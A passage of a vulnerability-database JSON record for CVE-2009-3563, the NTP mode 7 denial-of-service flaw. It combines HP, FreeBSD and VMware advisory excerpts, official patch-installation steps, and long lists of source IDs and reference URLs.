2b3a21a96b7855d9ca223f483bd5bfed\n  SHA1 results: ac2221c9d025008b258ac8592a210e16e775fbcf\n\nHP Tru64 UNIX v 5.1B-5 PK7 (BL28)\n  T64KIT1001786-V51BB28-ES-20100816\n  http://www13.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT1001786-V51BB28-ES-20100816\n  MD5 results:  b34d028797577408d565da27d93c30a9\n  SHA1 results: b34d028797577408d565da27d93c30a9\n\nNote:\nThe patch kit installation instructions and the Patch Summary and Release Notes documents provide patch kit installation and removal instructions and a summary of each patch. Please read these documents prior to installing patches. \nHP TCP/IP Services for OpenVMS v5.4, v5.5, v5.6, and v5.7 (only affected by CVE-2009-3563) on Itanium and Alpha platforms. \nPatch kit installation instructions are provided in the file readme.txt . ESXi userworld update for ntp\n\n    The Network Time Protocol (NTP) is used to synchronize the time of\n    a computer client or server to another server or reference time\n    source. \n\n    A vulnerability was discovered which may allow remote attackers to\n    spoof certificates by using MD2 design flaws to generate a hash\n    collision in less than brute-force time. NOTE: the scope of this\n    issue is currently limited because the amount of computation\n    required is still large. \n\n    This update also includes security fixes that were first addressed\n    in version openssl-0.9.8e-12.el5.i386.rpm. \n\n    Kerberos is a network authentication protocol. It is designed to\n    provide strong authentication for client/server applications by\n    using secret-key cryptography. This update fixes a flaw found in pam_krb5. In\n    some non-default configurations (specifically, where pam_krb5 would\n    be the first module to prompt for a password), a remote attacker\n    could use this flaw to recognize valid usernames, which would aid a\n    dictionary-based password guess attack. Service Console package bind updated to 9.3.6-4.P1.el5_4.2\n\n    BIND (Berkeley Internet Name Daemon) is by far the most widely used\n    Domain Name System (DNS) software on the Internet. \n\n    A vulnerability was discovered which could allow remote attacker to\n    add the Authenticated Data (AD) flag to a forged NXDOMAIN response\n    for an existing domain. \n\n    A vulnerability was found in the way that bind handles out-of-\n    bailiwick data accompanying a secure response without re-fetching\n    from the original source, which could allow remote attackers to\n    have an unspecified impact via a crafted response. \n\n    NOTE: ESX does not use the BIND name service daemon by default. Service Console package gcc updated to 3.2.3-60\n\n    The GNU Compiler Collection includes front ends for C, C++,\n    Objective-C, Fortran, Java, and Ada, as well as libraries for these\n    languages\n\n    GNU Libtool\u0027s ltdl.c attempts to open .la library files in the\n    current working directory.  This could allow a local user to gain\n    privileges via a Trojan horse file.  The GNU C Compiler collection\n    (gcc) provided in ESX contains a statically linked version of the\n    vulnerable code, and is being replaced. Service Console package sudo updated to 1.6.9p17-6.el5_4\n\n    Sudo (su \"do\") allows a system administrator to delegate authority\n    to give certain users (or groups of users) the ability to run some\n    (or all) commands as root or another user while providing an audit\n    trail of the commands and their arguments. \n\n    When a pseudo-command is enabled, sudo permits a match between the\n    name of the pseudo-command and the name of an executable file in an\n    arbitrary directory, which allows local users to gain privileges\n    via a crafted executable file. \n\n    When the runas_default option is used, sudo does not properly set\n    group memberships, which allows local users to gain privileges via\n    a sudo command. \nCorrected:      2010-01-06 21:45:30 UTC (RELENG_8, 8.0-STABLE)\n                2010-01-06 21:45:30 UTC (RELENG_8_0, 8.0-RELEASE-p2)\n                2010-01-06 21:45:30 UTC (RELENG_7, 7.2-STABLE)\n                2010-01-06 21:45:30 UTC (RELENG_7_2, 7.2-RELEASE-p6)\n                2010-01-06 21:45:30 UTC (RELENG_7_1, 7.1-RELEASE-p10)\n                2010-01-06 21:45:30 UTC (RELENG_6, 6.4-STABLE)\n                2010-01-06 21:45:30 UTC (RELENG_6_4, 6.4-RELEASE-p9)\n                2010-01-06 21:45:30 UTC (RELENG_6_3, 6.3-RELEASE-p15)\nCVE Name:       CVE-2009-3563\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:http://security.FreeBSD.org/\u003e. \n\nII. \n\nIII. \n\nIV.  Workaround\n\nProper filtering of mode 7 NTP packets by a firewall can limit the\nnumber of systems used to attack your resources.   Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to 6-STABLE, 7-STABLE or 8-STABLE,\nor to the RELENG_8_0, RELENG_7_2, RELENG_7_1, RELENG_6_4, or\nRELENG_6_3 security branch dated after the correction date. \n\n2) To patch your present system:\n\nThe following patches have been verified to apply to FreeBSD 6.3, 6.4,\n7.1, 7.2, and 8.0 systems. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n# fetch http://security.FreeBSD.org/patches/SA-10:02/ntpd.patch\n# fetch http://security.FreeBSD.org/patches/SA-10:02/ntpd.patch.asc\n\nb) Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n# cd /usr/src/usr.sbin/ntp/ntpd\n# make obj \u0026\u0026 make depend \u0026\u0026 make \u0026\u0026 make install\n# /etc/rc.d/ntpd restart\n\nVI.  Correction details\n\nThe following list contains the revision numbers of each file that was\ncorrected in FreeBSD. \n\nCVS:\n\nBranch                                                           Revision\n  Path\n- -------------------------------------------------------------------------\nRELENG_6\n  src/contrib/ntp/ntpd/ntp_request.c                          1.1.1.4.8.2\nRELENG_6_4\n  src/UPDATING                                            1.416.2.40.2.13\n  src/sys/conf/newvers.sh                                  1.69.2.18.2.15\n  src/contrib/ntp/ntpd/ntp_request.c                      1.1.1.4.8.1.2.1\nRELENG_6_3\n  src/UPDATING                                            1.416.2.37.2.20\n  src/sys/conf/newvers.sh                                  1.69.2.15.2.19\n  src/contrib/ntp/ntpd/ntp_request.c                         1.1.1.4.20.1\nRELENG_7\n  src/contrib/ntp/ntpd/ntp_request.c                         1.1.1.4.18.2\nRELENG_7_2\n  src/UPDATING                                             1.507.2.23.2.9\n  src/sys/conf/newvers.sh                                  1.72.2.11.2.10\n  src/contrib/ntp/ntpd/ntp_request.c                     1.1.1.4.18.1.4.1\nRELENG_7_1\n  src/UPDATING                                            1.507.2.13.2.13\n  src/sys/conf/newvers.sh                                   1.72.2.9.2.14\n  src/contrib/ntp/ntpd/ntp_request.c                     1.1.1.4.18.1.2.1\nRELENG_8\n  src/contrib/ntp/ntpd/ntp_request.c                              1.2.2.1\nRELENG_8_0\n  src/UPDATING                                              1.632.2.7.2.5\n  src/sys/conf/newvers.sh                                    1.83.2.6.2.5\n  src/contrib/ntp/ntpd/ntp_request.c                              1.2.4.1\n- -------------------------------------------------------------------------\n\nSubversion:\n\nBranch/path                                                      Revision\n- -------------------------------------------------------------------------\nstable/6/                                                         r201679\nreleng/6.4/                                                       r201679\nreleng/6.3/                                                       r201679\nstable/7/                                                         r201679\nreleng/7.2/                                                       r201679\nreleng/7.1/                                                       r201679\nstable/8/                                                         r201679\nreleng/8.0/                                                       r201679\nhead/                                                             r200576\n- -------------------------------------------------------------------------\n\nVII. \nThe upgrade is available by downloading from software.hp.com -\u003e HPUX 11i\nSoftware -\u003e Internet ready and networking -\u003e HP-UX Network Time Protocol\nversion 4 or directly from https://h20392.www2.hp.com/portal/swdepot/displayP\nroductInfo.do?productNumber=HPUX-NTP\nPlease review the Installation link at the bottom of the page.  For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nRelease Date: 2011-03-28\nLast Updated: 2011-03-24\n\n ------------------------------------------------------------------------------\n\nPotential Security Impact: Remote Denial of Service (DoS)\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified with HP-UX running XNTP. The vulnerability could be exploited remotely create a Denial of Service (DoS). \n\nReferences: CVE-2009-3563\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.11, B.11.23, B.11.31 running XNTP. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2009-3563    (AV:N/AC:L/Au:N/C:N/I:P/A:P)       6.4\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following patches to resolve this vulnerability. \nThe patches are available by contacting HP Support. \n\nhttp://itrc.hp.com\n\nHP-UX Release / Patch ID\n\nB.11.11 (11i v1) / PHNE_41907\n\nB.11.23 (11i v2) / PHNE_41908\n\nB.11.31 (11i v3) / PHNE_41177\n\nMANUAL ACTIONS: No\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.11\n==================\nInternetSrvcs.INETSVCS-BOOT\naction: install patch PHNE_41907 or subsequent\n\nHP-UX B.11.23\n==================\nInternetSrvcs.INETSVCS2-BOOT\naction: install patch PHNE_41908 or subsequent\n\nHP-UX B.11.31\n==================\nNTP.NTP-RUN\naction: install patch PHNE_41177 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) 28 March 2011 Initial release\n\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For further information, contact normal HP Services support channel. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. \nTo get the security-alert PGP key, please send an e-mail message as follows:\n  To: security-alert@hp.com\n  Subject: get key\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA\u0026langcode=USENG\u0026jumpid=in_SC-GEN__driverITRC\u0026topiccode=ITRC\nOn the web page: ITRC security bulletins and patch sign-up\nUnder Step1: your ITRC security bulletins and patches\n    -check ALL categories for which alerts are required and continue. \nUnder Step2: your ITRC operating systems\n    -verify your operating system selections are checked and save. \n\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\nLog in on the web page: Subscriber\u0027s choice for Business: sign-in. \nOn the web page: Subscriber\u0027s Choice: your profile summary - use Edit Profile to update appropriate sections. \n\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\n\n* The Software Product Category that this Security Bulletin\nrelates to is represented by the 5th and 6th characters\nof the Bulletin number in the title:\n\nGN = HP General SW\nMA = HP Management Agents\nMI = Misc. 3rd Party SW\nMP = HP MPE/iX\nNS = HP NonStop Servers\nOV = HP OpenVMS\nPI = HP Printing \u0026 Imaging\nST = HP Storage SW\nTL = HP Trusted Linux\nTU = HP Tru64 UNIX\nUX = HP-UX\nVV = HP VirtualVault\n\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. \n\n\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user\u0027s use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\"\n\nCopyright 2009 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2009-3563"
          },
          {
            "db": "CERT/CC",
            "id": "VU#568372"
          },
          {
            "db": "CERT/CC",
            "id": "VU#417980"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002446"
          },
          {
            "db": "BID",
            "id": "37255"
          },
          {
            "db": "VULMON",
            "id": "CVE-2009-3563"
          },
          {
            "db": "PACKETSTORM",
            "id": "83621"
          },
          {
            "db": "PACKETSTORM",
            "id": "86900"
          },
          {
            "db": "PACKETSTORM",
            "id": "83586"
          },
          {
            "db": "PACKETSTORM",
            "id": "94512"
          },
          {
            "db": "PACKETSTORM",
            "id": "105299"
          },
          {
            "db": "PACKETSTORM",
            "id": "90046"
          },
          {
            "db": "PACKETSTORM",
            "id": "84917"
          },
          {
            "db": "PACKETSTORM",
            "id": "121645"
          },
          {
            "db": "PACKETSTORM",
            "id": "99964"
          }
        ],
        "trust": 4.23
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2009-3563",
            "trust": 6.2
          },
          {
            "db": "CERT/CC",
            "id": "VU#568372",
            "trust": 3.7
          },
          {
            "db": "BID",
            "id": "37255",
            "trust": 2.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#417980",
            "trust": 2.6
          },
          {
            "db": "SECTRACK",
            "id": "1023298",
            "trust": 2.5
          },
          {
            "db": "VUPEN",
            "id": "ADV-2010-0510",
            "trust": 1.9
          },
          {
            "db": "SECUNIA",
            "id": "38764",
            "trust": 1.9
          },
          {
            "db": "VUPEN",
            "id": "ADV-2010-0528",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2010-0993",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "37922",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "37629",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "38832",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "38834",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "39593",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "38794",
            "trust": 1.1
          },
          {
            "db": "JUNIPER",
            "id": "JSA10673",
            "trust": 1.1
          },
          {
            "db": "JUNIPER",
            "id": "JSA10691",
            "trust": 1.1
          },
          {
            "db": "JVN",
            "id": "JVNVU93188600",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002446",
            "trust": 0.8
          },
          {
            "db": "FEDORA",
            "id": "FEDORA-2009-13090",
            "trust": 0.6
          },
          {
            "db": "FEDORA",
            "id": "FEDORA-2009-13121",
            "trust": 0.6
          },
          {
            "db": "REDHAT",
            "id": "RHSA-2010:0095",
            "trust": 0.6
          },
          {
            "db": "REDHAT",
            "id": "RHSA-2009:1651",
            "trust": 0.6
          },
          {
            "db": "REDHAT",
            "id": "RHSA-2009:1648",
            "trust": 0.6
          },
          {
            "db": "DEBIAN",
            "id": "DSA-1948",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200912-113",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2009-3563",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "83621",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "86900",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "83586",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "94512",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "105299",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "121022",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "90046",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "84917",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "121645",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "99964",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#568372"
          },
          {
            "db": "CERT/CC",
            "id": "VU#417980"
          },
          {
            "db": "VULMON",
            "id": "CVE-2009-3563"
          },
          {
            "db": "BID",
            "id": "37255"
          },
          {
            "db": "PACKETSTORM",
            "id": "83621"
          },
          {
            "db": "PACKETSTORM",
            "id": "86900"
          },
          {
            "db": "PACKETSTORM",
            "id": "83586"
          },
          {
            "db": "PACKETSTORM",
            "id": "94512"
          },
          {
            "db": "PACKETSTORM",
            "id": "105299"
          },
          {
            "db": "PACKETSTORM",
            "id": "121022"
          },
          {
            "db": "PACKETSTORM",
            "id": "90046"
          },
          {
            "db": "PACKETSTORM",
            "id": "84917"
          },
          {
            "db": "PACKETSTORM",
            "id": "121645"
          },
          {
            "db": "PACKETSTORM",
            "id": "99964"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200912-113"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002446"
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3563"
          }
        ]
      },
      "id": "VAR-200912-0769",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.42302127599999995
      },
      "last_update_date": "2026-03-07T20:12:15.882000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "NV10-001 Fujitsu Fujitsu \u00a0 Security information",
            "trust": 0.8,
            "url": "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18\u0026ID=4958"
          },
          {
            "title": "Debian CVElist Bug Report Logs: ntp: CVE-2009-3563 DoS through mode 7 packets",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=6af87915827741e9268f059d7932cd80"
          },
          {
            "title": "Ubuntu Security Notice: ntp vulnerability",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-867-1"
          },
          {
            "title": "Debian Security Advisories: DSA-1948-1 ntp -- denial of service",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=dccc5b29483e1b8bed9fa984fc8c8c6e"
          },
          {
            "title": "Cisco: Network Time Protocol Package Remote\u00a0Message Loop Denial of Service\u00a0Vulnerability",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=Cisco-SA-20091208-CVE-2009-3563"
          },
          {
            "title": "Debian Security Advisories: DSA-1992-1 chrony -- several vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=0329811e8a24491e35ce229b8b52259d"
          },
          {
            "title": "VMware Security Advisories: ESX Service Console and vMA third party updates",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=5f45ebecc93cf53cc0b45af03208cba6"
          },
          {
            "title": "VMware Security Advisories: ESXi utilities and ESX Service Console third party updates",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=9ca0d654a28a118d1f99d0ae3b1753e8"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2009-3563"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002446"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "NVD-CWE-Other",
            "trust": 1.0
          },
          {
            "problemtype": "design issues (CWE-DesignError) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002446"
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3563"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 3.0,
            "url": "http://www.kb.cert.org/vuls/id/568372"
          },
          {
            "trust": 2.5,
            "url": "http://security-tracker.debian.org/tracker/cve-2009-3563"
          },
          {
            "trust": 2.5,
            "url": "http://securitytracker.com/id?1023298"
          },
          {
            "trust": 2.5,
            "url": "http://www.securityfocus.com/bid/37255"
          },
          {
            "trust": 2.3,
            "url": "https://support.ntp.org/bugs/show_bug.cgi?id=1331"
          },
          {
            "trust": 1.9,
            "url": "http://www.vupen.com/english/advisories/2010/0510"
          },
          {
            "trust": 1.9,
            "url": "http://secunia.com/advisories/38764"
          },
          {
            "trust": 1.8,
            "url": "http://support.ntp.org/bin/view/main/securitynotice#dos_attack_from_certain_ntp_mode"
          },
          {
            "trust": 1.8,
            "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=560074"
          },
          {
            "trust": 1.7,
            "url": "https://rhn.redhat.com/errata/rhsa-2009-1651.html"
          },
          {
            "trust": 1.7,
            "url": "http://www.kb.cert.org/vuls/id/mapg-7x7vd7"
          },
          {
            "trust": 1.7,
            "url": "http://www.debian.org/security/2009/dsa-1948"
          },
          {
            "trust": 1.7,
            "url": "https://rhn.redhat.com/errata/rhsa-2009-1648.html"
          },
          {
            "trust": 1.7,
            "url": "http://www.kb.cert.org/vuls/id/mapg-7x7v6j"
          },
          {
            "trust": 1.7,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=531213"
          },
          {
            "trust": 1.7,
            "url": "https://www.redhat.com/archives/fedora-package-announce/2009-december/msg00809.html"
          },
          {
            "trust": 1.7,
            "url": "https://www.redhat.com/archives/fedora-package-announce/2009-december/msg00763.html"
          },
          {
            "trust": 1.7,
            "url": "https://rhn.redhat.com/errata/rhsa-2010-0095.html"
          },
          {
            "trust": 1.6,
            "url": "http://www.ubuntu.com/usn/usn-867-1"
          },
          {
            "trust": 1.6,
            "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=19540"
          },
          {
            "trust": 1.4,
            "url": "http://support.avaya.com/css/p8/documents/100071808"
          },
          {
            "trust": 1.4,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=isg1iz71047"
          },
          {
            "trust": 1.4,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=isg1iz68659"
          },
          {
            "trust": 1.1,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-275590-1"
          },
          {
            "trust": 1.1,
            "url": "https://lists.ntp.org/pipermail/announce/2009-december/000086.html"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/37922"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/37629"
          },
          {
            "trust": 1.1,
            "url": "http://aix.software.ibm.com/aix/efixes/security/xntpd_advisory.asc"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/38794"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2010/0528"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/38832"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/38834"
          },
          {
            "trust": 1.1,
            "url": "http://lists.vmware.com/pipermail/security-announce/2010/000082.html"
          },
          {
            "trust": 1.1,
            "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2010-005.txt.asc"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/39593"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2010/0993"
          },
          {
            "trust": 1.1,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-77-1021781.1-1"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=136482797910018\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=130168580504508\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10691"
          },
          {
            "trust": 1.1,
            "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10673"
          },
          {
            "trust": 1.1,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a7076"
          },
          {
            "trust": 1.1,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a19376"
          },
          {
            "trust": 1.1,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a12141"
          },
          {
            "trust": 1.1,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a11225"
          },
          {
            "trust": 1.0,
            "url": "https://www.kb.cert.org/vuls/id/417980"
          },
          {
            "trust": 0.9,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3563"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/rfc2827"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/rfc3704"
          },
          {
            "trust": 0.8,
            "url": "http://www.ntp.org/downloads.html"
          },
          {
            "trust": 0.8,
            "url": "http://bugs.gentoo.org/show_bug.cgi?id=290881"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu568372/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu93188600/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-3563"
          },
          {
            "trust": 0.8,
            "url": "https://kb.cert.org/vuls/id/417980"
          },
          {
            "trust": 0.4,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3563"
          },
          {
            "trust": 0.3,
            "url": "http://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_network_time"
          },
          {
            "trust": 0.3,
            "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026id=985679"
          },
          {
            "trust": 0.3,
            "url": "http://www.ntp.org/"
          },
          {
            "trust": 0.3,
            "url": "http://support.avaya.com/css/p8/documents/100073364"
          },
          {
            "trust": 0.3,
            "url": "http://support.avaya.com/css/p8/documents/100071806"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-0159"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1386"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2908"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1377"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3620"
          },
          {
            "trust": 0.2,
            "url": "http://www.vmware.com/security"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1387"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3228"
          },
          {
            "trust": 0.2,
            "url": "http://kb.vmware.com/kb/1055"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1378"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2695"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3621"
          },
          {
            "trust": 0.2,
            "url": "http://www.vmware.com/support/policies/security_response.html"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3547"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3286"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3613"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2695"
          },
          {
            "trust": 0.2,
            "url": "http://www.vmware.com/support/policies/eos.html"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2908"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0590"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3726"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3612"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1379"
          },
          {
            "trust": 0.2,
            "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
          },
          {
            "trust": 0.2,
            "url": "http://www.vmware.com/support/policies/eos_vi.html"
          },
          {
            "trust": 0.2,
            "url": "http://h30046.www3.hp.com/subsignin.php"
          },
          {
            "trust": 0.2,
            "url": "http://www.itrc.hp.com/service/cki/secbullarchive.do"
          },
          {
            "trust": 0.2,
            "url": "http://h30046.www3.hp.com/driveralertprofile.php?regioncode=na\u0026langcode=useng\u0026jumpid=in_sc-gen__driveritrc\u0026topiccode=itrc"
          },
          {
            "trust": 0.2,
            "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
          },
          {
            "trust": 0.2,
            "url": "https://www.hp.com/go/swa"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/.html"
          },
          {
            "trust": 0.1,
            "url": "https://usn.ubuntu.com/867-1/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20091208-cve-2009-3563"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/advisories"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4022"
          },
          {
            "trust": 0.1,
